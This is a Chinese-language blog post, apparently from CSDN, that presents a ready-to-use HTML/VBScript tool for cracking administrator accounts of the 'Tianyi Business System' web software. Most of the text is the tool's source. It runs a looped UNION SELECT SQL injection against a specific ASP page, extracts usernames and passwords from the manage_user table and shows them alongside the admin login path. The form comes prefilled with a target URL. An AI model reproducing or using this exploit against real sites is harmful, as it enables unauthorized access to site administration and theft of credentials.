天意商務系統後台管理帳號破解html版_安全相關

 
/**
慈勤強
http://blog.csdn.net/cqq
*/
自從上次寫了個天意商務系統破解程式之後，
收到了不少朋友的來信，
有詢問程式原理的，有詢問如何防護的。
今天，我抽了一點時間，做了這個Html版，就只有這一個htm檔案
相信有點html知識和SQL Injection知識的朋友都能夠看懂
原理非常簡單，破解使用者帳號是用的SQL Injection方法，
因為這套系統好多地方存在sql injection漏洞，
然後自己下載個這套系統，就可以很方便的找出問題了。
以前是Vc++版本，現在是html版本，不過都是一樣，
就是通過http協議取得網頁的源檔案
然後分析源檔案，找到使用者名稱和密碼
並且顯示出來。
下面是原始碼，大家只要把這個檔案儲存到硬碟上，起名叫ty.htm，就可以了。

<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312"> <title>天意商務系統後台管理帳號破解html版--慈勤強製作</title> <SCRIPT Language = "VbScript"> Function bytes2BSTR(vIn) strReturn = "" For i = 1 To LenB(vIn) ThisCharCode = AscB(MidB(vIn,i,1)) If ThisCharCode < &H80 Then strReturn = strReturn & Chr(ThisCharCode) Else NextCharCode = AscB(MidB(vIn,i+1,1)) strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode)) i = i + 1 End If Next bytes2BSTR = strReturn End Function Sub OpenUrl(strUrl) strTmp = "" strUser = "!" strAAA ="" strCqq="" i=0 on Error Resume Next While Trim(strUser) <> "" strPara = "/wlyx/show_cgal.asp?newsid=1%20and%201=2%20union%20select%201,username%2b'***'%2bpassword,3,4,5,6%20from%20manage_user%20where%20username>'" + strUser + "'%20union%20select%20*%20from%20cgal%20where%201=2" Set xmlhttp = CreateObject("Microsoft.XMLHTTP") xmlhttp.open "GET",(strUrl + strPara),false xmlhttp.send strAAA=getMid(bytes2BSTR(xmlhttp.ResponseBody), "<title>", "</title>") If Trim(strAAA) <> "" Then arr = Split(strAAA, "***") strUser = arr(0) strCqq = strCqq + vbNewLine + "使用者名稱：" + strUser + vbNewLine + "密 碼：" + arr(1) + vbNewLine + vbNewLine Else strUser = "" End If //msgbox xmlhttp.Response Set xmlhttp = Nothing Wend If strCqq<>"" Then strCqq="破解的後台管理帳號為：（後台預設地址："+strUrl+"/admin）"+vbCrLF+VBCRLF+strCqq+vbnewline cqqadmin.innerText=strCqq Else cqqadmin.innerText="出錯" End If End Sub Function getMid(str, str1, str2) str11 = "" i = InStr(str, str1) If i > 0 Then j = InStr(i, str, str2) If j > 0 Then str11 = Mid(str, i + Len(str1), j - i - Len(str1)) End If End If getMid = str11 End Function </script> <style type="text/css"> <!-- body,td,th { font-size: 9pt; } --> </style></head> <body> <table width="600" border="1" align="center" cellpadding="2" cellspacing="0" bordercolor="#D4D4D4" bgcolor="#E4E4E4"> <tr> <td width="39%">天意商務系統後台管理帳號破解html版</td> <td align="right">Powered By Steven_Cee Http://blog.csdn.net/cqq </td> </tr> </table> <table width="600" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td> <form name="frmCqq" method="post"> <input name="url" type="text" value="http://www.3shopok.net" size="44"> <input type="button" name="submit" value="提交" onClick="vbscript:OpenUrl(window.frmCqq.url.value)"> </form> </td> </tr> </table> <table width="600" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td width="20">  </td> <td><span id="cqqadmin"></span></td> </tr> </table> <table width="600" border="1" align="center" cellpadding="1" cellspacing="0" bordercolor="#E4E4E4" bgcolor="#E4E4E4"> <tr> <td align="center">協助說明，請看 </td> </tr> </table> <p> </p> <p> </p> <p> </p> </body> </html>
[Ctrl+A 全選 注:如需引入外部Js需重新整理才能執行]